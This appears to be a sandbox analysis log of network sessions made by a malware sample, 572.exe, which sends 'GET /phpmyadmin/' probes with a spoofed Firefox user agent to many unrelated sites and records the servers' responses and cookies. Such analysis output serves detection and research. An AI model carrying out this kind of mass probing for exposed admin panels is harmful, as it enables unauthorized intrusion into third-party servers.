https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: f7ffe492a986e11219fcca0962e31146
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:14:51 UTC | 664 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50943 | 184.25.164.103 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 183 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 233 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 54710 | 138.197.59.199 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 184 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 585 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=A0iUBDz0ojlIC0qq9RPBz7uw.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
2024-02-05 11:14:51 UTC | 554 | IN | Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 54856 | 104.21.60.188 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 173 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: netizion.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 962 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, no-cache, max-age=0
                                                                                                                                                                                                                                                                                                                                                                Link: </styles/fonts/fa/fa-regular-400-min.woff2?_v=5.15.3.1706539464>; rel=preload; as=font; crossorigin=anonymous
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: xf_csrf=_NnNhXcjjnO-7A8g; path=/; secure
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=awDfpweHRTLh2Do5qoCWylFboJgpuiEUMRdEESw4U9a3jCYb6lP6bXKHJ5dcPzxFz4Ezi8gAA4L1KNljSf%2F3BFhIdIDSqENAlN1QBUpXwVb7WurDcZ5A%2BsfRVps5wg0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6ef93c7bae-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:52 UTC | 407 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7bed<!DOCTYPE html><html id="XF" lang="en-US" dir="LTR" data-app="public" data-template="error" data-container-key data-content-key data-logged-in="false" data-cookie-prefix="xf_" data-csrf="1707131691,2d762086f961627e3f10ab80e779bb0b" data-style-id="1
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nt="width=device-width, initial-scale=1, viewport-fit=cover"><title>Oops! We ran into some problems. | Pinoy Tech Forum</title><link rel="manifest" href="/webmanifest.php"><meta name="theme-color" content="#3f4867" /><meta name="apple-mobile-web-app-t
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: r_theme_bg_picker.less%2Cpublic%3Axentr_top_section.less%2Cpublic%3Aextra.less&amp;s=17&amp;l=1&amp;d=1706979756&amp;k=bea084bedbd344210db122071a0438b1e62cf0f3" /><style>@font-face{font-family:'Font Awesome 5 Pro';font-style:normal;font-weight:300}.fal{
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: s/logo/favicon.png" sizes="32x32" /><link href="https://fonts.googleapis.com/css?family=Open+Sans:wght@300;400;500;600&subset=latin,latin-ext&display=swap" rel="stylesheet" type="text/css"><script async src="https://www.googletagmanager.com/gtag/js?id=G
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aria-label="Background color picker" aria-expanded="false" aria-haspopup="true"><i aria-hidden="true"></i><span class="p-navgroup-linkText">Background color picker</span></a><div class="menu menu--structural menu--medium" data-menu="menu" aria-hidden
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: whatsnew" aria-label="What&#039;s new" title="What&#039;s new"><i aria-hidden="true"></i><span class="p-navgroup-linkText">What's new</span></a><div class="p-search-body" id="xentrSearch"><form action="/search/search" method="post"><div class="p-se
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: div><input type="hidden" name="_xfToken" value="1707131691,2d762086f961627e3f10ab80e779bb0b" /></form></div><a href="/misc/style?style_id=16&amp;t=1707131691%2C2d762086f961627e3f10ab80e779bb0b" class="p-navgroup-link theme-switcher" data-xf-init="tool
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: uted u-smaller" aria-hidden="true"></i></span></span></label></div><div class="menu-row"><div class="inputGroup"><span class="inputGroup-text" id="ctrl_search_menu_by_member">By:</span><input type="text" class="input" name="c[users]" data-xf-init="a
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: iv><div class="th_holiday__categoryStrip__right"></div><button type="button" class="button--plain p-nav-menuTrigger button" data-xf-click="off-canvas" data-menu=".js-headerOffCanvasMenu" tabindex="0" aria-label="Menu"><span class="button-text"><i aria-
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rums">Search forums</a></div></div></div></li><li><div class="p-navEl " data-has-children="true"><a href="/whats-new/" class="p-navEl-link p-navEl-link--splitMenu " data-nav-id="whatsNew">What's new</a><a data-xf-key="3" data-xf-click="menu" data-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 54661 | 142.250.105.84 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:14:51 UTC | 1252 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a6k5eL8ehwPNJ8ZzRwnt8Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:14:51 UTC | 397 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 54904 | 31.13.65.1 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 177 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: web.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 376 | IN | HTTP/1.1 302 Found
Location: https://m.facebook.com/phpmyadmin/?_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 9XB+9BdPzg1fKhoev7k4DbdurK+AzjVbb0mtYDzVNDyNAANAzeQX+LJdud9UTnzIoTmDYWrKnENJfPGdYLMwhA==
Date: Mon, 05 Feb 2024 11:14:51 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 54613 | 31.13.88.1 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: hi-in.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 389 | IN | HTTP/1.1 302 Found
Location: https://m.facebook.com/phpmyadmin/?locale=hi_IN&_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: QExYUIi32XG7auovVRcGHCZXXRXcSeC7tF/28OkcA7u4tTklz+rQIA1l5tp6o6UKmBd9yzGV0qMSMnhYULWNHw==
Date: Mon, 05 Feb 2024 11:14:51 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 54848 | 31.13.65.1 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: pl-pl.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 389 | IN | HTTP/1.1 302 Found
Location: https://m.facebook.com/phpmyadmin/?locale=pl_PL&_rdr
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: ThfSFvj5lTdyUwI44BMMOvVBpK4ALLx5hdH5b6B6HOPhs2y5bnrH+7XA0546f1s5z2ttQHgbbJif6aZ301JXPg==
Date: Mon, 05 Feb 2024 11:14:51 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: close
Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                33192.168.2.655166142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 54903 | 172.66.40.88 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: warriorplus.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 1366 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-powered-by: PHP/7.0.33-6+ubuntu14.04.1+deb.sury.org+3
expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
pragma: no-cache
set-cookie: warriorplus=c14l8412vca5e543ogr2qmo762; expires=Wed, 06-Mar-2024 11:14:51 GMT; Max-Age=2592000; path=/
set-cookie: rqtok=374744f34b056f2b4672; expires=Tue, 06-Feb-2024 11:14:51 GMT; Max-Age=86400; path=/
set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: TOKEN=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: PASSWORD=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications_aff=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: notifications_sales=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:14:51 GMT; Max-Age=31536000; path=/
set-cookie: wpg=gw1s33s7p59ds9s2; expires=Tue, 04-Feb-2025 11:14:51 GMT; Max-Age=31536000; path=/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 54859 | 77.240.114.212 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 173 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: mw.redsa.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 335 | IN | HTTP/1.1 404 No Encontrado
Date: Mon, 05 Feb 2024 11:16:06 GMT
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Content-Type: text/html;charset=utf-8
Content-Language: es
Content-Length: 1060
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Connection: close
2024-02-05 11:14:51 UTC | 1060 | IN | Data Ascii: <!DOCTYPE html><html><head><title>Apache Tomcat/8.0.14 (Debian) - Informe de Error</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:wh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 55007 | 184.25.164.103 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 172 | OUT | GET / HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 1812 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://store.cloudflare.steamstatic.com/ https://store.cloudflare.steamstatic.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' http://store.steampowered.com https://store.steampowered.com http://127.0.0.1:27060 ws://127.0.0.1:27060 https://community.cloudflare.steamstatic.com/ https://steamcommunity.com/ https://steamcommunity.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://shared.cloudflare.steamstatic.com/ https://checkout.steampowered.com/; frame-src 'self' steam: http://www.youtube.com https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://steamcommunity.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'none';
X-Frame-Options: DENY
Strict-Transport-Security: max-age=10368000
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: close
Connection: Transfer-Encoding
Set-Cookie: steamCountry=US%7C30188d811e243eaaab468117a5a3e458; Path=/; Secure; HttpOnly; SameSite=None
Set-Cookie: browserid=3292762664476449515; Expires=Tue, 04 Feb 2025 11:14:51 GMT; Path=/; Secure; SameSite=None
Set-Cookie: sessionid=47ff0c288429b91038db8b2f; Path=/; Secure; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 55110 | 104.18.32.109 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 181 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: sport.autoplay.cloud
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:51 UTC | 625 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 05 Feb 2024 11:15:06 GMT
Set-Cookie: __cf_bm=WwDsDukp_YDhK47LsOLJF_f6r.mR7Vw8Abn0xPZ6qc0-1707131691-1-AQisbQbe15NUYYAtkbEwWZ9Elw6Q9W11IhJgQEaCPS6urIjQFa99ulpwxIhOZWuJm1nzKa3XmgZY+Hh7EjUVuaQ=; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.autoplay.cloud; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 850abb6fe9bc53d4-ATL
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 54964 | 104.21.85.95 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: v.xsanime.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
